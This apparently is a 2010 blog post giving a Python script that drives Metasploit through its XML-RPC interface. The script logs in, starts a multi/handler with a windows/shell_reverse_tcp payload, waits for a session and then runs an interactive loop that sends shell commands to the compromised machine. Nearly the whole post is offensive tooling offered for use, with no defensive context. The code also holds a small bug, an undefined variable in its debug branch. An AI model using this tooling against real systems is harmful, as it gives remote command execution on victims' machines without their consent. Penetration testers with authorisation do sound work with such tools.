Wednesday, June 16, 2010

python metasploit xmlrpc interface 1.0 


#!/usr/bin/python

import xmlrpclib
class MSFTransport(xmlrpclib.Transport):
    """Handles an transaction to the MetasploitXML-RPC server."""

    # client identifier (may be overridden)
    def __init__(self, use_datetime=0):
        self._use_datetime = use_datetime
    def request(self, host, handler, request_body, verbose=0):
        # issue XML-RPC request
        c = self.make_connection(host)
        if verbose:
            h.set_debuglevel(1)
        self.send_content(c, request_body)
        self.verbose = verbose
        return self._parse_response(None, c)

    def make_connection(self, host):
        import socket
        addr = host.split(":")
        inetaddr = (addr[0],int(addr[1]))
        c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        c.connect(inetaddr)
        return c
    def send_content(self, connection, request_body):
        if request_body:
            connection.send(request_body + "\0")
    def _parse_response(self, file, sock):
        # read response from input file/socket, and parse it
        p, u = self.getparser()
        while 1:
            if sock:
                response = sock.recv(1024)
            else:
                response = file.read(1024)
            if not response:
                break
            if response.endswith("\0")  :
                response = response.rstrip("\0\n")
                p.feed(response.encode("utf-8"))
                break;
            else:
                p.feed(response.encode("utf-8"))

        if file:
                file.close()
        p.close()

        return u.close()
################################
from time import sleep
import base64
import xmlrpclib
#import MSFTransport
msftransport = MSFTransport()
proxy = xmlrpclib.ServerProxy("http://127.0.0.1:55553", transport=msftransport)

ret = proxy.auth.login("msf","test")
if ret['result'] == 'success':
        token = ret['token']
else:
        print "Could not login\n"

opts = {
        "RHOST" : "192.168.1.1",
        "LHOST" : "127.0.0.1",
        "LPORT" : 4444,
        "PAYLOAD": "windows/shell_reverse_tcp"}
print "Running exploit now"
ret = proxy.module.execute(token,"exploit","multi/handler",opts)
if(ret['result'] == 'success'):
        print "Exploit sucessful...waiting on session"
sleep(25)
session_list =  proxy.session.list(token)
x = session_list.keys()

def s_io(s):
        while 1:
         w = raw_input("shell> ")
         if w == "exit":
                break
         write = w + "\n"
         n = proxy.session.shell_write(token,s,base64.b64encode(write))
         read = proxy.session.shell_read(token,s)
         print  base64.b64decode(read['data'])

if session_list != {} and session_list[x[0]]['type'] == 'shell':
        s =  int(x[0])
        s_io(s)
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)